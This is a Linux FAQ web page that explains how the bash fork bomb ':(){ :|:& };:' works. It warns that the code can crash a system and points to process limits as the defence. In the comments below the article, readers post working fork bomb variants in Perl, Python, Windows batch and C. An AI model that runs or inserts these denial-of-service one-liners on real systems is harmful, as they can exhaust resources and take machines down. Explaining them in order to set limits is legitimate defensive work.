About Linux FAQ

• So much to read, so little time! Read our FAQ to help you cut through the clutter of information overload. more »

• nixCraft welcomes readers' articles and guest blogging posts. We're interested in articles on programming, security, database, Linux and anything else related to technology.

Browse More FAQs:

• BASH Shell
• FreeBSD
• Linux
• Security
• UNIX
• See all FAQ sections...

Understanding Bash fork() bomb ~ :(){ :|:& };:

Q. Can you explain following bash code or bash fork() bomb?
:(){ :|:& };:

A. This is a bash function. It gets called recursively (recursive function). This is most horrible code for any Unix / Linux box. It is often used by sys admin to test user processes limitations (Linux process limits can be configured via /etc/security/limits.conf and PAM).

Once a successful fork bomb has been activated in a system it may not be possible to resume normal operation without rebooting, as the only solution to a fork bomb is to destroy all instances of it.

WARNING! These examples may crash your computer if executed.

Understanding :(){ :|:& };: fork() bomb code

:() - It is a function name. It accepts no arguments at all. Generally, bash function is defined as follows:

foo(){
 arg1=$1
 echo ''
 #do_something on $arg argument
}

fork() bomb is defined as follows:

:(){
 :|:&
};:

:|: - Next it call itself using programming technique called recursion and pipes the output to another call of the function ':'. The worst part is function get called two times to bomb your system.

& - Puts the function call in the background so child cannot die at all and start eating system resources.

; - Terminate the function definition

: - Call (run) the function aka set the fork() bomb.

Here is more human readable code:

bomb() {
 bomb | bomb &
}; bomb

Properly configured Linux / UNIX box should not go down when fork() bomb sets off.

Related: How to: Prevent a fork bomb by limiting user process under Linux.

Update: Check out comment # 5 for more fork bomb examples under Perl, Windows XP and C.

Subscribe to our free e-mail newsletter or RSS feed to get all updates. You can Email this page to a friend.

• How to use bash shell
• FreeBSD Install BASH Shell
• UNIX: Remove a file with a name starting with - character
• BASH Shell: How To Redirect stderr To stdout ( redirect stderr to a File )
• Why and How To Customize a UNIX / Linux User Account?

Discussion on This FAQ

1. mastrboy Says:
   November 26th, 2007 at 9:53 am

   i tested this on a fresh install of CentOS and it totaly crashed

   How about a nice “howto” for protecting against this attacks?

2. raj Says:
   November 27th, 2007 at 12:01 am

   I second the vote for a nice howto.

   Cheers

3. queue Says:
   November 27th, 2007 at 5:02 pm

   Thirded!

   How to prevent a “fork bomb”.

4. Bharat Says:
   November 28th, 2007 at 1:19 am

   Yes How to must be started, for the benefits of the innocent users, as the viruses are spread by entities whose brains are configured differently.

5. l33t Says:
   November 28th, 2007 at 9:09 am

   Perl exmaple:

   perl -e "fork while fork" &

   Python example:

   import os
     while(1):
         os.fork()

   Windows XP / Vista bat file example:

   :bomb
   start %0
   goto bomb

   UNIX style for Windows:

   %0|%0

   C program example:

   #include
    int main() {   while(1)      fork();  } 

   Plz note that the fork bomb is a form of denial of service, so don’t run on production or unauthorized system.

6. Ofloo Says:
   November 28th, 2007 at 11:42 am

   An other one is that when you have set a quota for your mailboxes and crontab is generating mail over and over eventually the quota will exceed, after a while the mailq will fill up with 1000’s of mail and the system will crash.

7. kunal Says:
   November 28th, 2007 at 11:52 am

   Hi,

   i run it on my testing server and it start consuming my server process.
   so one thing is clear from this form bomb that it starting issuing new processes rather than threads.

   how we prevent our sites from such fork attacks

   Thanks in advance

8. vivek Says:
   November 28th, 2007 at 12:56 pm

   kunal,

   Read http://www.cyberciti.biz/tips/linux-limiting-user-process.html

9. Bash Says:
   November 28th, 2007 at 2:27 pm

   I tried this on a virtual instance of SLAX, and it totally killed it.

10. bort Says:
    December 5th, 2007 at 4:21 pm

    perl inline…

    perl -e “fork while fork” &

11. ATOzTOA Says:
    January 30th, 2008 at 4:15 am

    Sleek code

    I tried on FC4. Took only 1 minute as root.

    In WinXP, I waited till 7 minutes. Displayed some errors and all, but was responding. Tried MS Word, Task Manager, nothing could be executed. The machine was useless untill reset.

12. bradley Says:
    March 31st, 2008 at 6:06 pm

    This works very quickly on all windows:

    :bomb
    %0 | %0
    goto bomb

Leave a Reply

We encourage your comments, and suggestions. But please stay on topic, be polite, and avoid spam. Thank you very much for stopping by our site!

Tags: :(){ :|:& };:, bash fork bomb, fork bomb

Search FAQs

Advertisements

Would you like to...

• Print this page
• Email this page

Archives

• Select Month August 2008 July 2008 June 2008 May 2008 April 2008 March 2008 February 2008 January 2008 December 2007 November 2007 October 2007 September 2007 August 2007 July 2007 June 2007 May 2007 April 2007 March 2007 February 2007 January 2007 December 2006 November 2006 October 2006 September 2006 August 2006 July 2006 June 2006 May 2006 April 2006 March 2006 February 2006 January 2006

more ~/options

• About us
• Testimonials
• Contact us

nixCraft RSS Feeds

Copyright © 2006-2008 nixCraft. All rights reserved - TOS/Disclaimer - Privacy policy - Sitemap - Powered by Open source software.